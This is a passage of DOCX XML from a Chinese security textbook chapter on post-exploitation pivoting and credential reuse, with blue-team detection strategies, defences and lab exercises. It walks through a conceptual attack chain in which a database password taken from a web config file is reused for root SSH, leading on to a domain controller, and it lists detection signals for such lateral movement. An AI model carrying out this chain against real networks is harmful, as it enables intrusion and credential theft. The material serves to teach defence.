      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检测策略：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络流量基线分析：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对每台主机建立正常的”出站连接目标集”基线。一台Web服务器正常的出站连接目标可能仅包括：数据库服务器（内网）、DNS服务器、外部API服务②。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">当主机的出站连接目标突然包含大量从未连接过的内网IP地址，或短时间内对多个端口进行探测式连接时，触发告警①。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数据源：NetFlow/IPFIX/sFlow采集器</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">流量基线分析平台②。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1181"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">连接中继特征检测：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1182"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">监控同一主机上的”入站连接-出站连接时间相关性”。如果一个来自外网的连接建立后，紧随其后的是该主机对内网主机的连接，且两条连接的数据传输量高度相关，这是极强的pivoting特征①。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1182"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">监控点：在核心交换机或防火墙的SPAN端口部署网络分析工具②。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1183"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端点行为与网络关联：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1184"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">如果端点检测到不明进程打开了socket监听端口，且随后该端口接收到来自外部IP的连接，同时该进程又主动连接了内网其他主机——这是完整的pivoting行为链①。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1184"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数据源：Sysmon</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Event ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3（网络连接事件）+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Event ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1（进程创建）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御/修复措施（网络分段为核心）：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">严格的网络分段（Network</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Segmentation）：将网络划分为多个安全区域（VLAN/子网），在区域边界通过防火墙/ACL实施默认拒绝策略——仅允许经审批的业务必需流量通过①。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DMZ与内网隔离：面向互联网的服务器（Web、邮件、DNS）应部署在DMZ网络段中，DMZ与内网之间通过防火墙严格隔离。DMZ主机不应具有对内网任意主机的连接权限，仅允许访问明确授权的内网服务（如Web服务器对数据库服务器的特定端口）①。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">跳板主机管理：对于确实需要同时连接多个网络段的管理主机（如运维跳板机/堡垒机），应：(a)仅限管理员使用；(b)启用全部会话审计与录像；(c)限制可执行的命令和可访问的目标；(d)实施多因素认证①。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">东西流量监控：多数安全投入集中在南北流量（互联网边界），但Pivoting发生在东西方向（内网横向）。应在核心交换层部署内网流量分析和微隔离策略，使横向移动即使发生也能被快速发现和阻断①。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">### 18.1.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">凭据复用：横向移动的"万能钥匙"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在信息收集与Pivoting的衔接区域，有一个贯穿始终的支撑要素——凭据复用（Credential</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Reuse）。它是横向移动效率倍增器，也是蓝队检测的关键焦点。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**原理**</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">当攻击者从初始立足点收集到一组有效凭据（域账户密码、SSH私钥、数据库连接字符串等）后，这些凭据极有可能在多个系统中有效。原因在于企业环境中的常见实践缺陷：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">管理员为方便管理，在多台服务器上使用相同的本地管理员密码①；</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务账户（Service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Accounts）的密码被硬编码在多个应用程序的配置文件中②；</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">域账户本身设计为在域内多台机器上有效，且密码长期不变①；</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH私钥被复制到多台服务器以实现免密登录和自动化运维①。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">结果是：攻击者获得一个凭据，可能直接获得数十台服务器的访问权。这就是凭据复用的威力。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**攻击路径示意（概念层级）**</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">假设攻击者在Web服务器A（初始立足点）的配置文件`/var/www/html/config.php`中发现MySQL连接字符串：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mysql://webapp:SuperSecretP@ss</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">@10.0.2.50:3306/webdb</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者尝试用密码`SuperSecretP@ss`以root身份SSH连接到数据库服务器`10.0.2.50`——如果成功，数据库服务器沦陷。接着，在数据库服务器上发现`/opt/backup/scripts/sync.sh`连接文件服务器`10.0.3.100`的SSH私钥——攻击者又拿到了文件服务器的root权限③。进一步，在文件服务器上发现域管理员使用RDP登录记录的缓存凭据——通过凭据提取技术，攻击者最终获得域控制器的最高权限。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这条攻击链（Web服务器→数据库服务器→文件服务器→域控制器）的每一步都依赖凭据复用。每个环节之间的信任关系构成了攻击者的"阶梯"。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**蓝队检测凭据复用的关键信号**</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">凭据复用的可检测性较高，因为它在不同系统中产生异常的使用模式：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**同一凭据在短时间内从多台主机登录**：域账户`webapp`通常只在Web服务器群中使用。如果监测到`webapp`账户突然在从未登录过的数据库服务器上发起登录请求，应触发告警①。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**凭据使用的地理/网络位置异常**：如果一个用户账户同时从北京办公室和新加坡VPN节点登录，这是明显的地理异常①。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**横向移动的时间窗口**：蓝队可以通过汇聚登录事件日志，分析账户登录的"横向移动链"——账户A在时间T1登录主机X，同一账户在极短的T2登录主机Y，主机Y并非账户A的常规工作站点①。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**检测对照框：凭据复用的蓝队检测**</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检测策略：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">登录行为基线与异常检测：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为每个账户建立”正常登录主机集”和”正常登录时间段”基线。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">当一个账户首次登录到历史基线外的主机，或在非工作时间登录时，触发告警①。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数据源：Windows安全事件日志（Event</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">4624/4625）；Linux:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> /var/log/auth.log②。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1185"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">横向移动链追踪：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1186"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将登录事件按时间顺序排列，识别”账户→主机A→主机B→主机C”的异常跳转链。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1186"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">尤其关注高权限账户（如域管理员）的横向移动①。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1187"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">凭据使用频率监控：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1188"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">监控NT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LAN Manager </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(NTLM)认证请求的数量和速率。短时间内一个账户针对多个目标发起NTLM认证是典型的密码喷洒或凭据复用攻击特征②。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御/修复措施：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实施Local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Administrator Password Solution </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(LAPS)：确保每台加入域的主机使用不同的、定期轮换的本地管理员密码，从根本上消除横向移动中的本地管理员密码复用①。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">最小权限原则与服务账户隔离：服务账户的权限应限定在完成其职能所需的最小范围，不应具有域管理员权限或对无关服务器的登录权限。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">多因素认证（MFA）：对关键系统（域控制器、堡垒机、VPN）强制MFA。即使攻击者获得凭据，没有第二因素也无法登录①。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">特权访问管理（PAM）：将高权限账户的使用纳入特权会话管理平台，所有特权操作须申请、审批、审计①。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">### </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">交叉回指框：网络层底座与权限模型的衔接</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节的Pivoting讨论基于《从位到物联》第26章的路由与子网模型：每个网络接口关联一个子网，路由表决定数据包的出站接口。Pivoting在此底座之上增加了"以已控主机的身份中继流量"这一层。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后渗透信息收集中涉及的凭据与权限概念，与本书第15章（Linux提权）和第16章（Windows提权与AD入门）形成衔接：信息收集阶段获取的用户信息、组成员资格、凭据缓存，将直接服务于提权和横向移动阶段。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">### </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**提取题**：后渗透信息收集的五个主要维度是什么？各维度中列举一个代表性的信息收集目标。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">*提示*：回顾18.1.1节的分类结构。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">*解答*：①网络环境信息（如路由表）；②主机与服务发现（如存活主机列表）；③用户与凭据信息（如SSH私钥）；④信任关系与访问链路（如NFS挂载）；⑤域环境信息（如域管理员组成员）。下文仅列示例，实际题目可要求学员自行填空。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**提取题**：Pivoting的原理是什么？解释一个双宿主主机如何帮助攻击者访问原本不可达的内网子网。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">*提示*：从路由表和"中继"的角度回答。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">*解答*：已控双宿主主机同时连接攻击者可达的网段和目标内网段。攻击者在已控主机上部署代理或端口转发服务，将攻击流量发送到代理，代理以己控主机的本地IP身份向内网目标发起连接。对内网目标而言，连接来自一台合法内网主机，防火墙不阻拦。代理将返回的数据沿原路回传给攻击者。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**迁移任务（靶机实操）**：在自建的隔离实验环境中（如何搭建参见本书第2章），使用Metasploitable或VulnHub靶机的低权限shell，执行以下信息收集练习：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查看网络接口信息和路由表；</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">使用ARP表和简单的bash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
